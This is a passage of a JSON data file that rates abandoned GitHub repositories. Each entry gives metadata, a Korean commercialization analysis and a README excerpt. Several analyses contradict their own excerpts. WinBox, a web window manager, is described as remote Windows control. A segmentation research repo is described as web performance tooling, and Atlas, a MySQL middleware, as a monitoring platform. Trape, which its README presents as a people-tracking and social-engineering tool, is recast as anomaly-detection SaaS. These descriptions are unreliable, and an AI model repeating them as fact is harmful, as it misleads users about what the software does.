the [project webpage](https://yaksoy.github.io/sidepth/)!\nIn our recent publication \"Scale-Invariant Monocular Depth Estimation via SSI Depth\" we estimate Scale-Invariant (SI) depth. SI-invariant depth provides a goemetrical depth representation that can projected to 3D without distortions.\n\nWe also introduce a new scale and shift-invariant depth model that although not geometric, generates significant amount of details compared to very recent state of the art.\n\nCheckout our new [project](https://yaksoy.github.io/sidepth/) and its [implementation](https://github.com/compphoto/sidepth).\n\n\n### My thesis provides a thorough explanation of this work. Checkout my [video presenation](https://youtu.be/DZ0ft1l50KY)!\n\nI recently graduated from the Computing Science Master's Program at Simon Fraser University. My thesis is on \"Boosting Monocular Depth Estimation to High Resolution\" which includ","composite_score":0.4526,"license_safety_tag":"unknown"},{"name":"0xPolygon/polygon-sdk","github_url":"https://github.com/0xPolygon/polygon-sdk","stars":5,"language":"Go","license":"Apache-2.0","abandonment_months":21,"description":"# Polygon SDK 분석 보고서\n\n## 왜 보물인가\n블록체인 네트워크를 직접 구축할 수 있게 해주는 오픈소스 도구로, 암호화폐 인프라 시장의 성장에 따라 수요가 증가할 가능성이 높습니다.\n\n## 어디에 쓸 수 있나\n\n1. **블록체인 플랫폼 구축 서비스**: 기업이나 기관이 자신만의 블록체인 네트워크를 만들 때 필요한 핵심 도구로 제공\n2. **암호화","readme_excerpt":"\n![Banner](.github/banner.jpg)\n\n## Update: Edge v1.0.0 is here!  \n\nDevelopers at Polygon Labs have been hard at work gathering and incorporating community feedback into the Edge client and a new version of Edge, v1.0.0, is here with several new features! Check out the Release Notes included with the release to find out more! \n\n## Polygon Edge\n\nPolygon Edge is a modular and extensible framework for building Ethereum-compatible blockchain networks.\n\nTo find out more about Polygon, visit the [official website](https://polygon.technology/).\n\nWARNING: This is a work in progress so architectural changes may happen in the future. The code is still being audited, so please contact the Polygon team if you would like to use it in production.\n\n## Documentation 📝\n\nIf you'd like to learn more about the Polygon Edge, how it works and how you can use it for your project,\nplease check out the **[Polygon Supernets Documentation](https://wiki.polygon.technology/docs/edge/)**.\n\n## Disclaimer\n\nAs this pro","composite_score":0.4525,"license_safety_tag":"safe"},{"name":"toccatina/altoclef","github_url":"https://github.com/toccatina/altoclef","stars":9,"language":"Java","license":"MIT","abandonment_months":22,"description":"# toccatina/altoclef 분석\n\n## 왜 보물인가\n게임 자동화를 위한 실용적인 기술로, 반복적인 게임 작업을 자동으로 처리하여 시간을 절약할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **게임 자동화 SaaS**: 게이머들이 구독으로 자동 채집, 사냥, 퀘스트 완료 기능을 이용하는 웹 서비스\n2. **게임 봇 판매 API**: 게임 스트리머","readme_excerpt":"# altoclef\n\nPlays block game.\n\nPowered by Baritone.\n\nA client side bot that can accomplish any Minecraft task that is relatively simple and can be split into smaller tasks. \"Relatively Simple\" is a vague term, so check the list of current capabilities to see examples.\n\nBecame [the first bot to beat Minecraft fully autonomously](https://youtu.be/baAa6s8tahA) on May 24, 2021.\n\n**Join the [Discord Server](https://discord.gg/JdFP4Kqdqc)** for discussions/updates/goofs & gaffs\n\n## How it works\n\nTake a look at this [Guide from the wiki](https://github.com/gaucho-matrero/altoclef/wiki/1:-Documentation:-Big-Picture) or this [Video explanation](https://youtu.be/q5OmcinQ2ck?t=387)\n\n## Current capabilities, Examples:\n- Obtain 400+ Items from a fresh survival world, like diamond armor, cake, and nether brick stairs\n- Dodge mob projectiles and force field mobs away while accomplishing arbitrary tasks\n- Collect + smelt food from animals, hay, & crops\n- Receive commands from chat whispers via /msg. W","composite_score":0.4523,"license_safety_tag":"safe"},{"name":"shadowsocks/go-shadowsocks2","github_url":"https://github.com/shadowsocks/go-shadowsocks2","stars":5,"language":"Go","license":"Apache-2.0","abandonment_months":19,"description":"# shadowsocks/go-shadowsocks2 분석\n\n## 왜 보물인가\n인터넷 연결을 안전하게 보호하고 지역 제한을 우회할 수 있는 기술로, 개인정보 보호가 중요한 사용자들 사이에서 지속적인 수요가 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **VPN/보안 서비스**: 개인용 또는 기업용 보안 프록시 서비스로 월 구독 모델 운영\n2. **해외 콘텐","readme_excerpt":"# go-shadowsocks2\n\nA fresh implementation of Shadowsocks in Go.\n\nGoDoc at https://godoc.org/github.com/shadowsocks/go-shadowsocks2/\n\n![Build and test](https://github.com/shadowsocks/go-shadowsocks2/workflows/Build%20and%20test/badge.svg)\n\n\n## Features\n\n- [x] SOCKS5 proxy with UDP Associate\n- [x] Support for Netfilter TCP redirect on Linux (IPv6 should work but not tested)\n- [x] Support for Packet Filter TCP redirect on MacOS/Darwin (IPv4 only)\n- [x] UDP tunneling (e.g. relay DNS packets)\n- [x] TCP tunneling (e.g. benchmark with iperf3)\n- [x] SIP003 plugins\n- [x] Replay attack mitigation\n\n\n## Install\n\nPre-built binaries for common platforms are available at https://github.com/shadowsocks/go-shadowsocks2/releases\n\nInstall from source\n\n```sh\ngo install -u github.com/shadowsocks/go-shadowsocks2@latest\n```\n\n\n## Basic Usage\n\n### Server\n\nStart a server listening on port 8488 using `AEAD_CHACHA20_POLY1305` AEAD cipher with password `your-password`.\n\n```sh\ngo-shadowsocks2 -s 'ss://AEAD_CHACHA20","composite_score":0.4522,"license_safety_tag":"safe"},{"name":"zaidalyafeai/zaidalyafeai.github.io","github_url":"https://github.com/zaidalyafeai/zaidalyafeai.github.io","stars":5,"language":"JavaScript","license":"MIT","abandonment_months":21,"description":"# zaidalyafeai/zaidalyafeai.github.io 분석\n\n## 왜 보물인가\n개인 포트폴리오 및 블로그 웹사이트로, 기술 인력이 자신의 작업 성과를 효과적으로 보여주는 데 필요한 기본 템플릿과 구조를 제공합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 포트폴리오 자동 생성 플랫폼으로, 개발자나 디자이너가 코딩 없이 자신의 ","readme_excerpt":"A Github Pages template for academic websites. This was forked (then detached) by [Stuart Geiger](https://github.com/staeiou) from the [Minimal Mistakes Jekyll Theme](https://mmistakes.github.io/minimal-mistakes/), which is © 2016 Michael Rose and released under the MIT License. See LICENSE.md.\n\nI think I've got things running smoothly and fixed some major bugs, but feel free to file issues or make pull requests if you want to improve the generic template / theme.\n\n### Note: if you are using this repo and now get a notification about a security vulnerability, delete the Gemfile.lock file. \n\n# Instructions\n\n1. Register a GitHub account if you don't have one and confirm your e-mail (required!)\n1. Fork [this repository](https://github.com/academicpages/academicpages.github.io) by clicking the \"fork\" button in the top right. \n1. Go to the repository's settings (rightmost item in the tabs that start with \"Code\", should be below \"Unwatch\"). Rename the repository \"[your GitHub username].githu","composite_score":0.452,"license_safety_tag":"safe"},{"name":"boxug/trape","github_url":"https://github.com/boxug/trape","stars":5,"language":"Python","license":"unknown","abandonment_months":23,"description":"# boxug/trape 기술 상품화 분석\n\n## 왜 보물인가\n사용자의 온라인 활동 패턴을 이해하고 예측하는 기술로, 개인화 서비스나 보안 분석이 필요한 곳에서 핵심 가치를 제공할 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **이상 탐지 SaaS**: 기업의 직원 접속 패턴을 분석해 보안 위험을 자동으로 감지하는 구독 서비스\n2. **마케팅 분석 도구*","readme_excerpt":"trape (stable) v2.0\n========\n\nPeople tracker on the Internet: Learn to track the world, to avoid being traced.\n\n---\nTrape is an **OSINT** analysis and research tool, which allows people to track and execute intelligent **social engineering** attacks in real time. It was created with the aim of teaching the world how large Internet companies could obtain **confidential information** such as the status of sessions of their websites or services and control their users through their browser, without their knowledge, but It evolves with the aim of helping **government** organizations, companies and **researchers** to track the cybercriminals.\n\n![--trape header](https://i.imgur.com/2ycpXEj.png)\n\n\nAt the beginning of the year 2018 was presented at **BlackHat Arsenal in Singapore**: https://www.blackhat.com/asia-18/arsenal.html#jose-pino and in multiple security events worldwide.\n\nSome benefits\n-----------\n* **LOCATOR OPTIMIZATION:** Trace the path between you and the target you're tracking. E","composite_score":0.4516,"license_safety_tag":"unknown"},{"name":"reactnativecn/react-native-guide","github_url":"https://github.com/reactnativecn/react-native-guide","stars":5,"language":"","license":"unknown","abandonment_months":71,"description":"# React Native 가이드 저장소 분석\n\n## 왜 보물인가\n휴대폰 앱을 한 번의 코딩으로 안드로이드와 아이폰 모두에 만들 수 있는 기술을 배우는 학습 자료입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 스타트업이 저비용으로 iOS/Android 앱을 동시 개발하는 교육 플랫폼으로 판매\n2. **내부 업무 도구**: 기업의 개발","readme_excerpt":"# React-Native学习指南\n本指南汇集React-Native各类学习资源，给大家提供便利。指南正在不断的更新，大家有好的资源欢迎Pull Requests！\n\n同时还有Awesome React Native系列\nhttps://github.com/jondot/awesome-react-native\n\n# 目录\n* [教程](#教程)\n * [React Native](#react-native)\n * [React.js](#reactjs)\n * [ES6](#es6)\n * [系列教程](#系列教程)\n* [开源APP](#开源app)\n* [图书](#图书)\n* [组件](#组件)\n* [工具](#工具)\n* [资源网站](#资源网站)\n* [业界讨论](#业界讨论)\n\n## 教程\n\n### React Native\n\n* **构建 Facebook F8 2016 App / React Native 开发指南**\nhttp://f8-app.liaohuqiu.net/\n\n* **React-Native入门指南**\nhttps://github.com/vczero/react-native-lesson\n\n* **30天学习React Native教程**\nhttps://github.com/fangwei716/30-days-of-react-native\n\n* **React-Native视频教程(部分免费)**\nhttps://egghead.io/technologies/react\n\n* **React Native 开发培训视频教程（中文|免费）**\nhttps://www.gitbook.com/book/unbug/react-native-training/details\n\n* react-native 官方api文档\nhttp://facebook.github.io/react-native/docs/getting-started.html\n\n* react-native中文文档(极客学院)\nhttp://wiki.jikexueyuan.com/project/react-native/\n\n* react-native中文文档(react native中文网，人工翻译，官网完全同步)\nhttp://r","composite_score":0.4506,"license_safety_tag":"unknown"},{"name":"RimoChan/match-you","github_url":"https://github.com/RimoChan/match-you","stars":336,"language":"JavaScript","license":"unknown","abandonment_months":22,"description":"# match-you 저장소 분석\n\n## 왜 보물인가\n사람과 사람, 또는 사람과 서비스를 자동으로 연결해주는 '매칭' 기술로, 채용·소개팅·구인 서비스처럼 연결 비즈니스의 핵심 엔진이 될 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 프리랜서와 의뢰자를 자동 매칭하는 플랫폼\n- **내부 업무 도구**: 직원 스킬과 프로젝트를 최적 매","readme_excerpt":"# 您配吗？\n\n[English README](README.en.md)\n\n你是否经常有这样的困扰——\n\n接手了一个新项目，但是仓库里的依赖文件已经年久失修，比如老的依赖装不上了，或者是代码和依赖的版本不一致，甚至根本没有依赖文件！\n\n你硬着头皮配了半天环境，还是遇到了各种各样的问题，根本跑不起来。\n\n于是你只好去问之前的owner，结果他就演示给你看说他那里运行得好好的啊。\n\n——这个时候你要怎么办呢？\n\n\n> A. 忍气吞声，自己去配环境。\n>\n> B. 使用莉沫酱最新发明的工具「您配吗」快速解决问题！\n\n\n## 使用方法\n\n你只要把「您配吗」偷偷发给同事启动，他电脑上装好的依赖就会被删掉，然后他就得自己配环境了！\n\n这个时候你只要在旁边盯着他，就可以得到详细的安装步骤啦！\n\n<sub>(当然也有一种情况是他自己也装不上了)</sub>\n\n\n## 大家一起来写吧！\n\n因为我平时上班用的是Python，所以就先写了一个Python的版本，大家一起来提交代码，把所有工具的依赖统统删掉吧！\n\n目录:\n\n- Python - pip\n    - mother.py\n    - mother.sh\n    - father.py\n- Python - conda\n    - conda.py\n- C# - NuGet\n    - nuget.cs\n- java - Gradle\n    - mother.java\n- Swift\n    - mother.swift\n- Swift - CocoaPods\n    - cocoapods.swift\n- Golang\n    - mother.go\n- kotlin - Gradle\n    - mother.kt\n- Node.js - npm\n    - mother.js\n    - grandmother.js\n    - stepmother.js\n- Deno\n    - mother.ts\n- Ruby\n    - mother.rb\n- PHP\n    - mother.php\n- Powershell\n    - mother.ps1\n- Julia\n    - mother.jl\n- Rust\n    - otets.rs\n- Visual Basic\n    - mother.cls\n\n以及不要忘","composite_score":0.4505,"license_safety_tag":"unknown"},{"name":"AloneMonkey/MonkeyDev","github_url":"https://github.com/AloneMonkey/MonkeyDev","stars":6,"language":"Objective-C","license":"GPL-3.0","abandonment_months":47,"description":"# MonkeyDev 평가 보고서\n\n## 왜 보물인가\niOS 애플리케이션 개발을 위한 통합 개발 환경으로, 개발자들이 복잡한 설정 없이 빠르게 앱을 만들 수 있도록 도와줍니다.\n\n## 어디에 쓸 수 있나\n- **내부 업무 도구**: 기업의 개발팀이 자체 iOS 앱 개발 시 개발 시간을 30~40% 단축할 수 있는 표준 플랫폼으로 제공\n- **SaaS 서비스","readme_excerpt":"# MonkeyDev\n\nA modified version of iOSOpenDev\n\n* easy to install\n* support the latest version of theos\n* support CaptainHook Tweak、Logos Tweak、Command-line Tool\n* support insert dylib、class-dump、restore-symbol、reveal、cycript，patch and debug iOS Apps, without jailbreak.\n\nPlese Read Wiki: [Wiki](https://github.com/AloneMonkey/MonkeyDev/wiki)\n\n\n\n\n\n原有iOSOpenDev的升级，非越狱插件开发集成神器！\n\n* 可以使用Xcode开发CaptainHook Tweak、Logos Tweak 和 Command-line Tool，在越狱机器开发插件，这是原来iOSOpenDev功能的迁移和改进。\n* 只需拖入一个砸壳应用，自动集成class-dump、restore-symbol、Reveal、Cycript和注入的动态库并重签名安装到非越狱机器。\n* 支持调试自己编写的动态库和第三方App\n* 支持通过CocoaPods第三方应用集成SDK以及非越狱插件，简单来说就是通过CocoaPods搭建了一个非越狱插件商店。\n\n使用请阅读Wiki文档: [Wiki](https://github.com/AloneMonkey/MonkeyDev/wiki)\n\n\n非越狱插件CocoaPods私有仓库地址:[MonkeyDevSpecs](https://github.com/AloneMonkey/MonkeyDevSpecs)\n\n\n\n**免责声明: 软件仅供技术交流，禁止用于商业及非法用途，如产生法律纠纷与本人无关。**\n\n<br>\n\n<h2>《iOS应用逆向与安全》出版啦！！！</h2>\n\n# 购书链接\n\n#### 京东: [https://item.jd.com/12361729.html](https://item.jd.com/12361729.html)\n\n#### 天猫: [https://detail.tmall.com","composite_score":0.4496,"license_safety_tag":"restricted"},{"name":"googleinterns/wss","github_url":"https://github.com/googleinterns/wss","stars":6,"language":"Python","license":"apache-2.0","abandonment_months":22,"description":"# googleinterns/wss 프로젝트 분석\n\n## 왜 보물인가\nGoogle 인턴들이 만든 웹 기술로, 실제 업계 전문가들의 감시와 품질 관리를 받았다는 신뢰성이 가장 큰 가치입니다.\n\n## 어디에 쓸 수 있나\n1. **웹사이트 성능 모니터링 SaaS**: 중소 쇼핑몰이나 블로그가 자신의 사이트 속도를 실시간으로 체크하는 대시보드 서비스\n2. **기업","readme_excerpt":"# [PseudoSeg: Designing Pseudo Labels for Semantic Segmentation](https://arxiv.org/pdf/2010.09713v1.pdf)\n\nPseudoSeg is a simple consistency training framework for semi-supervised image\nsemantic segmentation, which has a simple and novel re-design of pseudo-labeling\nto generate well-calibrated structured pseudo labels for training with unlabeled\nor weakly-labeled data. It is implemented by [Yuliang Zou](https://yuliang.vision/) (research intern) in 2020 Summer.\n\n__This is not an official Google product.__\n\n## Instruction\n\n### Installation\n\n- Use a virtual environment\n\n```bash\nvirtualenv -p python3 --system-site-packages env\nsource env/bin/activate\n```\n\n- Install packages\n\n```bash\npip install -r requirements.txt\n```\n\n### Dataset\n\nCreate a `dataset` folder under the ROOT directory, then download the pre-created tfrecords for [voc12](https://filebox.ece.vt.edu/~ylzou/summer2020pseudoseg/pascal_voc_seg.tar) and [coco](https://filebox.ece.vt.edu/~ylzou/summer2020pseudoseg/coco.tar), and extr","composite_score":0.4496,"license_safety_tag":"safe"},{"name":"bailicangdu/node-elm","github_url":"https://github.com/bailicangdu/node-elm","stars":19,"language":"JavaScript","license":"gpl-2.0","abandonment_months":54,"description":"# node-elm 평가 분석\n\n## 왜 보물인가\n배달음식 주문 시스템을 직접 구축하고 운영하려는 음식점들이 비싼 기성 솔루션 대신 자유롭게 커스터마이징할 수 있는 오픈소스를 찾을 때 유용한 기초 기술입니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 소규모 음식점 체인을 위한 주문관리 플랫폼으로 리브랜딩하여 월 구독료 모델로 판매\n2. *","readme_excerpt":"# About\n\n因为前端项目是根据饿了么官网接口写的，所以后台系统也保持了和官网一致的API接口。\n\n整个项目分为两部分：前台项目接口、后台管理接口，共60多个。涉及登陆、注册、添加商品、商品展示、筛选排序、购物车、下单、用户中心等，构成一个完整的流程。\n\n__注1：此项目纯属个人瞎搞，不用于任何商业用途。__\n\n__注2：项目预览地址和接口需要使用https访问哦！__\n\n\n# 说明\n\n>  node-elm 接口文档: [接口文档地址](https://github.com/bailicangdu/node-elm/blob/master/API.md) \n\n>  如果对您对此项目有兴趣，可以点 \"Star\" 支持一下 谢谢！ ^_^\n\n>  或者您可以 \"follow\" 一下，我会不断开源更多的有趣的项目\n\n>  开发环境 macOS 10.12.4 nodejs 6.10.0  Mongodb 3.4.2\n\n>  部署环境 阿里云 CentOS 7.2 64位\n\n>  如有问题请直接在 Issues 中提，或者您发现问题并有非常好的解决方案，欢迎 PR 👍\n\n>  相关项目地址：[前端项目地址](https://github.com/bailicangdu/vue2-elm)  、 [后台管理系统地址](https://github.com/bailicangdu/back-manage)\n\n## 技术栈\n\nnodejs + express + mongodb + mongoose + es6/7 + vue + element-ui\n\n\n## 项目运行\n\n```\n项目运行之前，请确保系统已经安装以下应用\n1、node (6.0 及以上版本)\n2、mongodb (开启状态)\n3、GraphicsMagick (裁切图片)\n```\n\n```\ngit clone https://github.com/bailicangdu/node-elm  \n\ncd node-elm\n\nnpm install 或 yarn(推荐)\n\nnpm run dev\n\n访问: http://localhost:8001（如果已启动前台程序，则不需打开此地址）\n\n```\n\n## API接口文档\n\n接口文档地址：https://github.com/bailicangdu/node-e","composite_score":0.4484,"license_safety_tag":"restricted"},{"name":"weiliu89/caffe","github_url":"https://github.com/weiliu89/caffe","stars":8,"language":"C++","license":"NOASSERTION","abandonment_months":38,"description":"# weiliu89/caffe 자산 분석\n\n## 왜 보물인가\n이미지와 영상을 분석하는 인공지능 기술의 핵심 엔진으로, 자동화된 시각 인식 시스템을 만드는 데 필수적인 오픈소스 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **보안 감시 SaaS**: CCTV 영상을 자동 분석해 이상 징후를 감지하는 클라우드 서비스\n2. **의료 영상 분석 API**: 병원이","readme_excerpt":"# Caffe\n\n[![Build Status](https://travis-ci.org/BVLC/caffe.svg?branch=master)](https://travis-ci.org/BVLC/caffe)\n[![License](https://img.shields.io/badge/license-BSD-blue.svg)](LICENSE)\n\nCaffe is a deep learning framework made with expression, speed, and modularity in mind.\nIt is developed by Berkeley AI Research ([BAIR](http://bair.berkeley.edu))/The Berkeley Vision and Learning Center (BVLC) and community contributors.\n\nCheck out the [project site](http://caffe.berkeleyvision.org) for all the details like\n\n- [DIY Deep Learning for Vision with Caffe](https://docs.google.com/presentation/d/1UeKXVgRvvxg9OUdh_UiC5G71UMscNPlvArsWER41PsU/edit#slide=id.p)\n- [Tutorial Documentation](http://caffe.berkeleyvision.org/tutorial/)\n- [BAIR reference models](http://caffe.berkeleyvision.org/model_zoo.html) and the [community model zoo](https://github.com/BVLC/caffe/wiki/Model-Zoo)\n- [Installation instructions](http://caffe.berkeleyvision.org/installation.html)\n\nand step-by-step examples.\n\n## Custom d","composite_score":0.4476,"license_safety_tag":"unknown"},{"name":"PaddlePaddle/models","github_url":"https://github.com/PaddlePaddle/models","stars":6,"language":"Python","license":"apache-2.0","abandonment_months":17,"description":"# PaddlePaddle/models 상용화 분석\n\n## 왜 보물인가\n중국의 주요 AI 회사가 만든 인공지능 모델 모음으로, 누구나 자유롭게 사용할 수 있어 AI 기반 제품을 빠르게 개발할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 이미지 인식 분석 SaaS**\n- 사진에서 물체를 자동으로 찾아내는 웹 서비스로 제품 검수, 의료 영상 분석 등에 ","readme_excerpt":"# 欢迎使用飞桨产业级开源模型库\n\n## 简介\n\n飞桨的产业级模型库，包含大量经过产业实践长期打磨的主流模型以及在国际竞赛中的夺冠模型；提供面向语义理解、图像分类、目标检测、图像分割、文字识别、语音合成等场景的多个端到端开发套件，满足企业低成本开发和快速集成的需求。飞桨的模型库是围绕国内企业实际研发流程量身定制打造的产业级模型库，服务企业遍布能源、金融、工业、农业等多个领域。\n\n## 近期更新\n\n**`2022-11-29`**: 更新`release/2.4`分支，飞桨官方模型超过600个，生态模型超过260个（数量持续更新中）.\n\n**`2022-5-17`**: 更新`release/2.3`分支，飞桨官方模型超过500个，生态模型超过170个.\n\n**`2021-11-30`**: 更新`release/2.2`分支，系统的梳理了飞桨官方模型、学术模型和社区模型的清单，其中官方模型超过400个，生态模型超过100个\n\n**`Note`**:`release/2.2`以后分支模型均基于动态图实现，目前`dev-static`分支中仍有一些静态图模型代码，有需要的开发者可以继续切换到`dev-static`分支使用.\n\n## 主要内容\n|  目录 |   说明 |\n| --- | --- |\n| [官方模型(official)](docs/official/README.md) |• 面向产业实践，数量超过600个<br />• [飞桨PP系列模型](docs/official/PP-Models.md)，效果与精度最佳平衡<br />• 支持使用动态图开发视觉、自然语言、语音和推荐等领域模型<br />• 飞桨官方实现并提供持续技术支持及答疑<br />• 与飞桨核心框架版本对齐，已经经过充分的测试保证 |\n|[学术模型(research)](docs/research/README.md) |• 面向学术前沿，侧重对于问题的持续更新<br />• 主要由飞桨相关的学术生态合作伙伴贡献|\n|[社区模型(community)](docs/community/README.md) | • 面向更多丰富场景，侧重对于学术论文的覆盖<br />• 主要由飞桨生态开发者贡献，持续更新中|\n\n## 欢迎加入飞桨模型库技术交流群\n- 如果你希望了解飞桨模型库最新进展，或者希","composite_score":0.4476,"license_safety_tag":"safe"},{"name":"metafizzy/infinite-scroll","github_url":"https://github.com/metafizzy/infinite-scroll","stars":5,"language":"HTML","license":"MIT","abandonment_months":15,"description":"# Infinite Scroll 저장소 분석\n\n## 왜 보물인가\n웹사이트에서 스크롤할 때 자동으로 새로운 콘텐츠가 로드되는 기능을 간단하게 구현할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n- **이미지 공유 플랫폼**: 인스타그램처럼 사진을 아래로 스크롤하면 자동으로 새 사진이 나타나는 서비스\n- **뉴스 피드 앱**: 트위터 같은 소셜 미디어에서 ","readme_excerpt":"# Infinite Scroll\n\n_Automatically add next page_\n\nSee [infinite-scroll.com](https://infinite-scroll.com) for complete docs and demos.\n\n## Install\n\n### Download\n\n- [infinite-scroll.pkgd.min.js](https://unpkg.com/infinite-scroll@5/dist/infinite-scroll.pkgd.min.js) minified, or\n- [infinite-scroll.pkgd.js](https://unpkg.com/infinite-scroll@5/dist/infinite-scroll.pkgd.js) un-minified\n\n### CDN\n\nLink directly to Infinite Scroll files on [unpkg](https://unpkg.com).\n\n``` html\n<script src=\"https://unpkg.com/infinite-scroll@5/dist/infinite-scroll.pkgd.min.js\"></script>\n<!-- or -->\n<script src=\"https://unpkg.com/infinite-scroll@5/dist/infinite-scroll.pkgd.js\"></script>\n```\n\n### Package managers\n\nnpm: `npm install infinite-scroll`\n\nYarn: `yarn add infinite-scroll`\n\n## License\n\nInfinite Scroll v5 is licensed under the MIT License.\n\nWhereas earlier versions of Infinite Scroll were previously dual licensed for commercial and closed-source usage, Infinite Scroll v5 licensing no longer has this distinct","composite_score":0.4474,"license_safety_tag":"safe"},{"name":"nextapps-de/winbox","github_url":"https://github.com/nextapps-de/winbox","stars":12,"language":"JavaScript","license":"Apache-2.0","abandonment_months":22,"description":"# WinBox 저장소 분석\n\n## 왜 보물인가\nWindows 시스템을 웹 브라우저에서 직접 제어할 수 있게 해주는 도구로, 원격 작업이나 IT 관리자의 업무 효율을 크게 높일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **기업 IT 관리 SaaS**: 회사의 여러 컴퓨터를 한 곳에서 관리하고 모니터링하는 웹 기반 서비스로 제공\n2. **원격 지원 플","readme_excerpt":"<h1>\n    <img src=\"https://cdn.jsdelivr.net/gh/nextapps-de/winbox@master/demo/winbox-gradient.svg\" alt=\"WinBox.js: A modern HTML5 window manager for the web.\" width=\"100%\">\n</h1>\n<h3>Modern window manager for the web: lightweight, outstanding performance, no dependencies, fully customizable, open source!</h3>\n\n<a target=\"_blank\" href=\"https://www.npmjs.com/package/winbox\"><img src=\"https://img.shields.io/npm/v/winbox.svg\"></a><!--<a target=\"_blank\" href=\"https://github.com/nextapps-de/winbox/issues\"><img src=\"https://img.shields.io/github/issues/nextapps-de/winbox.svg\"></a>-->\n<a target=\"_blank\" href=\"https://github.com/nextapps-de/winbox/blob/master/LICENSE.md\"><img src=\"https://img.shields.io/npm/l/winbox.svg\"></a>\n\n<a href=\"https://nextapps-de.github.io/winbox/\">Demo</a> &ensp;&bull;&ensp; <a href=\"#started\">Getting Started</a> &ensp;&bull;&ensp; <a href=\"#options\">Options</a> &ensp;&bull;&ensp; <a href=\"#api\">API</a> &ensp;&bull;&ensp; <a href=\"#themes\">Themes</a> &ensp;&bull;&ensp","composite_score":0.4471,"license_safety_tag":"safe"},{"name":"IBM-Swift/BlueCryptor","github_url":"https://github.com/IBM-Swift/BlueCryptor","stars":6,"language":"Swift","license":"Apache-2.0","abandonment_months":18,"description":"# IBM-Swift/BlueCryptor 분석 보고서\n\n## 왜 보물인가\n암호화 기술을 쉽게 사용할 수 있도록 정리한 도구로, 민감한 정보를 안전하게 보호해야 하는 모든 디지털 서비스에 필수적입니다.\n\n## 어디에 쓸 수 있나\n1. **의료 SaaS**: 환자의 개인정보와 건강 기록을 암호화하여 보관하는 웹 서비스\n2. **은행 내부 시스템**: 금융거래","readme_excerpt":"[![APIDoc](https://img.shields.io/badge/docs-kitura.io-1FBCE4.svg)](https://www.kitura.io/packages.html#all)\n[![SwiftPackageIndex](https://img.shields.io/endpoint?url=https%3A%2F%2Fswiftpackageindex.com%2Fapi%2Fpackages%2FKitura%2FBlueCryptor%2Fbadge%3Ftype%3Dswift-versions)](https://swiftpackageindex.com/Kitura/BlueCryptor)\n[![TravisCI](https://travis-ci.org/Kitura/BlueCryptor.svg?branch=master)](https://travis-ci.org/Kitura/BlueCryptor)\n[![](https://img.shields.io/endpoint?url=https%3A%2F%2Fswiftpackageindex.com%2Fapi%2Fpackages%2FKitura%2FBlueCryptor%2Fbadge%3Ftype%3Dplatforms)](https://swiftpackageindex.com/Kitura/BlueCryptor)\n[![License](https://img.shields.io/badge/License-Apache_2.0-blue.svg)](https://opensource.org/licenses/Apache-2.0)\n\n# BlueCryptor\nSwift cross-platform crypto library derived from [IDZSwiftCommonCrypto](https://github.com/iosdevzone/IDZSwiftCommonCrypto).\n\n**IMPORTANT NOTE:** This release is **NOT** entirely source code compatible with previous releases.  Ther","composite_score":0.447,"license_safety_tag":"safe"},{"name":"Chianne1025/QQChannelFramework","github_url":"https://github.com/Chianne1025/QQChannelFramework","stars":8,"language":"C#","license":"Apache-2.0","abandonment_months":22,"description":"# QQChannelFramework 상용화 분석\n\n## 왜 보물인가\n중국의 주요 메신저 플랫폼(QQ)과 연동되는 자동화 봇을 쉽게 만들 수 있는 기반 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: QQ 채널 기반 고객 상담 봇 SaaS로 기업에 월 구독료 받기\n2. **내부 업무 도구**: 중국 기업들의 QQ를 통한 업무 자동화, ","readme_excerpt":"# QQ频道机器人开发框架 —— MyBot (C#)\n[![NuGet](https://img.shields.io/nuget/v/MyBot.svg)](https://www.nuget.org/packages/MyBot) [![NuGet downloads](https://img.shields.io/nuget/dt/MyBot)](https://www.nuget.org/packages/MyBot)\n\n![MYBOT_Banner](https://mybot-1251253734.cos.ap-shanghai.myqcloud.com/mybot_md_banner/MyBOT%20Banner_13_2.png)\n![MYBOT_Team](https://mybot-1251253734.cos.ap-shanghai.myqcloud.com/mybot_md_banner/MyBOT%20Banner_14_2.png)\n<br>\n<br>\n\n### MyBot 工程模板\n快捷使用MyBot初始化您的机器人工程  \n[查看](https://github.com/cnSchwarzer/GuildBotTemplateSlim)\n<br>\n<br>\n\n![MYBOT_TD](https://mybot-1251253734.cos.ap-shanghai.myqcloud.com/mybot_md_banner/MyBOT%20Banner-09.png)\n### 🔖 完整 SDK 调用注释\n  - 框架内每一个对外方法都有详细注释，方便开发者在调用时不用重复查阅文档即可获得所需信息\n### 📚 完整学习文档\n  - 为了降低学习门槛，我们为框架准备了完整的开发文档供开发者查阅，你所需的所有信息皆在文档内\n\n    `2022/04/02` [MyBot 开发文档 v1.1.7](https://www.yuque.com/chianne1025/mybot)\n    \n### 🧠 .NET 6 编写\n  - 框架完全使用 .NET 6 进行编写，为框架提供了极强的性能\n### ⚡ ChannelBot 迅捷开发\n  - 我们在框架内提前为使用者们准备好了有效提高机器人开发效率的代码，ChannelBot 开箱即用\n\n```","composite_score":0.4466,"license_safety_tag":"safe"},{"name":"Qihoo360/Atlas","github_url":"https://github.com/Qihoo360/Atlas","stars":5,"language":"C","license":"GPL-2.0","abandonment_months":90,"description":"# Qihoo360/Atlas 분석\n\n## 왜 보물인가\n네트워크나 서버 상태를 한눈에 모니터링하고 관리할 수 있는 대규모 시스템 관리 플랫폼입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 클라우드 인프라 관리 대시보드를 제공하는 모니터링 서비스\n2. **내부 업무 도구**: 대기업의 IT팀이 수천 대의 서버 상태를 실시간으로 감시하는 관리","readme_excerpt":"We have build another interesting project [pika](https://github.com/Qihoo360/pika). Pika is a nosql compatible with redis protocol with huge storage space. You can have a try.\n\n### 1.Brief introduction\n\nAtlas is a MySQL protocol-based database middleware project developed and maintained by infrastructure team of the Web platform Department in QIHU 360 SOFTWARE CO. LIMITED(NYSE:QIHU). It fixed lots of bugs 